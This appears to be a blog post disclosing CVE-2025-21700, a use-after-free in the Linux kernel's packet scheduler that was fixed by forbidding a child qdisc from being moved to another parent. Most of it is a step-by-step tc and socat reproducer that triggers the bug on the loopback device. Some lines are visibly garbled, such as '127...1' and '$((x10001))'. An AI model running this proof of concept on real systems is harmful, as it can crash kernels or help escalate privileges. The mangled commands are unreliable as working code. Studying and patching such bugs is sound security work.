CVE-2025-21700: Linux Kernel Vulnerability Fixed in net: sched - Disallow Replacing of Child qdisc from One Parent to Another

In a recent update to the Linux kernel, a vulnerability has been resolved pertaining to the net scheduler (sched) subsystem. This vulnerability could potentially be exploited for privilege escalation through the use of a user-after-free (UAF) bug. Lion Ackermann was able to create a UAF that can be abused for privilege escalation with a script consisting of several steps, which are listed later in this post.

The vulnerability revolves around the replacement of child qdisc from one parent to another. The Linux kernel now disallows such a replacement, preventing potential exploitation of this vulnerability. Ackermann's original script serves as a demonstration of the vulnerability, before the patch is applied.

To understand and try out Ackermann's script, you can follow the detailed steps outlined in the code snippet below:

# Step 1. create root qdisc
tc qdisc add dev lo root handle 1: drr

# step2. a class for packet aggregation to demonstrate uaf
tc class add dev lo classid 1:1 drr

# step3. a class for nesting
tc class add dev lo classid 1:2 drr

# step4. a class to graft qdisc to
tc class add dev lo classid 1:3 drr

# step5.
tc qdisc add dev lo parent 1:1 handle 2: plug limit 1024

# step6.
tc qdisc add dev lo parent 1:2 handle 3: drr

# step7.
tc class add dev lo classid 3:1 drr

# step 8.
tc qdisc add dev lo parent 3:1 handle 4: pfifo

# step 9. Display the class/qdisc layout
tc class ls dev lo
tc qdisc ls

# step10. trigger the bug <=== prevented by this patch
tc qdisc replace dev lo parent 1:3 handle 4:

# step 11. Redisplay again the qdiscs/classes
tc class ls dev lo
tc qdisc ls

# Step 12.  send one packet to plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127...1:8888,priority=$((x10001))

# step13.  send one packet to the grafted fifo
echo "" | socat -u STDIN UDP4-DATAGRAM:127...1:8888,priority=$((x10003))

# step14. let's trigger the uaf
tc class delete dev lo classid 1:3
tc class delete dev lo classid 1:1

The semantics of "replace" are for a delete/add operation on the same node, and not a delete from one node (3:1) and add to another node (1:3), as in step 10. While the script could be adapted to account for the fixed vulnerability, the patch prevents such configurations in the first place to avoid possible unforeseen consequences.

This fix is a result of joint work with Lion Ackermann. Make sure to apply the latest Linux kernel updates and patches to avoid potential security risks posed by this and other vulnerabilities.

For other related Linux kernel vulnerability fixes, check out the Linux Kernel Archives.

Timeline

Published on: 02/13/2025 12:15:27 UTC
Last modified on: 03/13/2025 13:15:48 UTC